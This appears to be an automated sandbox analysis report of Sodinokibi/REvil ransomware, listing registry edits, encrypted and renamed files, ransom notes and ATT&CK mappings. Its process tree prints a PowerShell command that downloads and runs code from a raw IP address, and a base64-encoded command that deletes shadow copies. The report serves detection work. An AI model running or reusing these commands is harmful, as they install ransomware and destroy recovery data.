76ee3c8dc45d565ba2d9666eb33537e532b6	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E	powershell.exe

Discovering connected drives 3 TTPs 7 IoCs

ransomware

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

powershell.execmd.exepowershell.exe

description	ioc	process
File opened (read-only)	\??\B:	powershell.exe
File opened (read-only)	\??\E:	powershell.exe
File opened (read-only)	\??\C:	cmd.exe
File opened (read-only)	\??\C:	powershell.exe
File opened (read-only)	\??\A:	powershell.exe
File opened (read-only)	\??\F:	powershell.exe
File opened (read-only)	\??\C:	powershell.exe

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1892 powershell.exe

pid	process
1892	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1868 wrote to memory of 1892	1868	cmd.exe	powershell.exe
PID 1892 wrote to memory of 2000	1892	powershell.exe	powershell.exe
PID 1892 wrote to memory of 2000	1892	powershell.exe	powershell.exe
PID 1892 wrote to memory of 2000	1892	powershell.exe	powershell.exe
PID 1892 wrote to memory of 2000	1892	powershell.exe	powershell.exe

Blacklisted process makes network request 99 IoCs

Processes:

powershell.exe

flow	pid	process
3	1892	powershell.exe
5	1892	powershell.exe
7	1892	powershell.exe
9	1892	powershell.exe
11	1892	powershell.exe
13	1892	powershell.exe
15	1892	powershell.exe
17	1892	powershell.exe
19	1892	powershell.exe
21	1892	powershell.exe
23	1892	powershell.exe
25	1892	powershell.exe
27	1892	powershell.exe
29	1892	powershell.exe
30	1892	powershell.exe
32	1892	powershell.exe
34	1892	powershell.exe
35	1892	powershell.exe
37	1892	powershell.exe
39	1892	powershell.exe
41	1892	powershell.exe
43	1892	powershell.exe
45	1892	powershell.exe
47	1892	powershell.exe
49	1892	powershell.exe
50	1892	powershell.exe
52	1892	powershell.exe
53	1892	powershell.exe
55	1892	powershell.exe
57	1892	powershell.exe
58	1892	powershell.exe
60	1892	powershell.exe
62	1892	powershell.exe
63	1892	powershell.exe
65	1892	powershell.exe
67	1892	powershell.exe
68	1892	powershell.exe
70	1892	powershell.exe
72	1892	powershell.exe
73	1892	powershell.exe
75	1892	powershell.exe
77	1892	powershell.exe
79	1892	powershell.exe
81	1892	powershell.exe
82	1892	powershell.exe
84	1892	powershell.exe
86	1892	powershell.exe
88	1892	powershell.exe
91	1892	powershell.exe
93	1892	powershell.exe
95	1892	powershell.exe
97	1892	powershell.exe
99	1892	powershell.exe
100	1892	powershell.exe
103	1892	powershell.exe
105	1892	powershell.exe
107	1892	powershell.exe
109	1892	powershell.exe
110	1892	powershell.exe
112	1892	powershell.exe
113	1892	powershell.exe
115	1892	powershell.exe
117	1892	powershell.exe
119	1892	powershell.exe

Drops file in Program Files directory 33 IoCs

Processes:

powershell.exe

description	ioc	process
File created	\??\c:\program files\54x5b562w7-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\MoveWait.tif	powershell.exe
File opened for modification	\??\c:\program files\SkipApprove.xhtml	powershell.exe
File renamed	C:\Program Files\MoveWait.tif => \??\c:\program files\MoveWait.tif.54x5b562w7	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\54x5b562w7-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ConvertToFormat.ini	powershell.exe
File opened for modification	\??\c:\program files\ExpandProtect.ods	powershell.exe
File opened for modification	\??\c:\program files\GrantOpen.inf	powershell.exe
File opened for modification	\??\c:\program files\RestartSave.xltm	powershell.exe
File renamed	C:\Program Files\RestartSave.xltm => \??\c:\program files\RestartSave.xltm.54x5b562w7	powershell.exe
File opened for modification	\??\c:\program files\SuspendGrant.m4a	powershell.exe
File renamed	C:\Program Files\SuspendGrant.m4a => \??\c:\program files\SuspendGrant.m4a.54x5b562w7	powershell.exe
File opened for modification	\??\c:\program files\UnpublishConvertTo.rmi	powershell.exe
File created	\??\c:\program files (x86)\54x5b562w7-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\LockBackup.au	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\54x5b562w7-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\UnpublishSync.aifc	powershell.exe
File renamed	C:\Program Files\DisableCopy.M2T => \??\c:\program files\DisableCopy.M2T.54x5b562w7	powershell.exe
File renamed	C:\Program Files\ExpandProtect.ods => \??\c:\program files\ExpandProtect.ods.54x5b562w7	powershell.exe
File opened for modification	\??\c:\program files\RestartUninstall.midi	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\54x5b562w7-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\EditRepair.mpv2	powershell.exe
File renamed	C:\Program Files\GrantOpen.inf => \??\c:\program files\GrantOpen.inf.54x5b562w7	powershell.exe
File renamed	C:\Program Files\LockBackup.au => \??\c:\program files\LockBackup.au.54x5b562w7	powershell.exe
File renamed	C:\Program Files\RestartUninstall.midi => \??\c:\program files\RestartUninstall.midi.54x5b562w7	powershell.exe
File renamed	C:\Program Files\SplitRestart.bmp => \??\c:\program files\SplitRestart.bmp.54x5b562w7	powershell.exe
File renamed	C:\Program Files\ConvertToFormat.ini => \??\c:\program files\ConvertToFormat.ini.54x5b562w7	powershell.exe
File renamed	C:\Program Files\EditRepair.mpv2 => \??\c:\program files\EditRepair.mpv2.54x5b562w7	powershell.exe
File renamed	C:\Program Files\SkipApprove.xhtml => \??\c:\program files\SkipApprove.xhtml.54x5b562w7	powershell.exe
File renamed	C:\Program Files\UnpublishSync.aifc => \??\c:\program files\UnpublishSync.aifc.54x5b562w7	powershell.exe
File opened for modification	\??\c:\program files\DisableCopy.M2T	powershell.exe
File renamed	C:\Program Files\UnpublishConvertTo.rmi => \??\c:\program files\UnpublishConvertTo.rmi.54x5b562w7	powershell.exe
File opened for modification	\??\c:\program files\SplitRestart.bmp	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\AxRJbHcj.bat"
1⤵
- Discovering connected drives
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/AxRJbHcj');Invoke-ZGEHTGOG;Start-Sleep -s 10000"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
- Modifies system certificate store
- Discovering connected drives
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in System32 directory
PID:1892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Discovering connected drives
PID:2000

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1544

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads